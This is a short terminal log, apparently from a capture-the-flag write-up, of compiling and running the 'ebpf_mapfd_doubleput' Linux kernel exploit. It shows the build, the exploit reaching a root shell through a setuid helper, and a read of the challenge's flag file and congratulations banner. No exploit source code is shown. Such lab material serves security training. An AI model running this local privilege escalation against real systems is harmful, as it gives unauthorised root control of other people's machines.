ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
$ cd ebpf_mapfd_doubleput_exploit
$ ls
compile.sh
doubleput.c
hello.c
suidhelper.c
$ ./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
               ^
$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
whoami
root

rootになれた

cd /root
ls
the-flag.txt
cat the-flag.txt
 __        __   _ _   ____                   _ _ _ _ 
 \ \      / /__| | | |  _ \  ___  _ __   ___| | | | |
  \ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
   \ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|
    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
                                                     

Congratulations are in order.  :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!